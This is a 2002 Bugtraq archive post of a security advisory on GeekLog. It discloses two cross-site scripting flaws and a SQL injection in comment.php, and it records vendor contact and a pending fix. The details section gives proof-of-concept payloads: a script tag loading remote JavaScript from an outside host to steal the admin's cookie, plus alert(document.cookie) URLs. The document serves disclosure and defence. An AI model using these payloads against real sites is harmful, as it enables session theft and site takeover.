Home page logo
/

bugtraq logo Bugtraq mailing list archives

[ARL02-A13] Multiple Security Issues in GeekLog
From: Ahmet Sabri ALPER <s_alper () hotmail com>
Date: 10 Jun 2002 11:41:43 -0000



+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A13    ----/----------/+
+/-----------\----- salper () olympos org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in GeekLog
Software Package   : GeekLog
Vendor Homepage    : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 31/05/2002
Vendor Replied     : 01/06/2002
Prior Problems     : N/A
Current Version    : v1.3.5rc1 (vulnerable)


Summary
-------
GeekLog is a web content management system suitable for 
running full-featured community sites. It supports article 
posting, threaded comments, event scheduling, and link 
management and is built around a design philosophy that 
emphasizes ease of use.

I have found these issues while testing the GeekLog system 
which was to be used at http://www.olympos.org, "Olympos 
Turkish Security Portal".
2 different types of Cross Site Scripting issues, plus 
1 SQL Injection vulnerability was found in GeekLog.


Details
-------
1. When any user sends a new Calender Event, the form is submitted 
to the site admin for approval. The $url variable, which holds the 
data given in the "Link" section of the form, is not filtered for 
malicious code. So a malicious user may get the cookie of the site 
administrator and therefore "own" the site.
Also this issue may be exploited to run malicious code on the GeekLog 
site.
Proof-of-concept Link input ($url):
&lt;script src="http://forum.olympos.org/f.js";>Alper&lt;/script&gt;

2. Maliciously crafted links from third party sites may allow Cross 
Site Scripting attacks via "index.php" and/or "comment.php". 
Two examples for this;
/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/comment.php?mode=display&sid=foo&pid=18&title=&lt;script&gt;alert
(document.cookie)&lt;/script&gt;&type=article

3. The $pid variable is directly passed to SQL input. This makes it 
possible for attackers to launch SQL injection attacks.
/comment.php?
mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

As the "Magic Quotes" function of PHP escapes the quoting characters, 
this third issue might just cause "light" headaches, but if the "Magic 
Quotes" is not active, the attacker may be able to get all the information 
about users from the SQL tables.


Solution
--------
The vendor replied and acted quickly.
A patch or a new version pointing this issue will
soon be available via CVS or a FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net

The development team of GeekLog said that; they will 
be cleaning out the code for similar security issues, 
which were mentioned above.


Credits
-------
Discovered on 31, May, 2002 by 
Ahmet Sabri ALPER <salper () olympos org>
ALPER Research Labs.

The ALPER Research Labs. [ARL] workers are freelancer 
security professionals and WhiteHat hackers. The ARL 
workers are available for hiring for legal jobs.
The ARL also supports Open Software Community, by detecting 
possible security issues in GPL or any other Public Licensed 
product.


References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/


  By Date           By Thread  

Current thread:
  • [ARL02-A13] Multiple Security Issues in GeekLog Ahmet Sabri ALPER (Jun 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault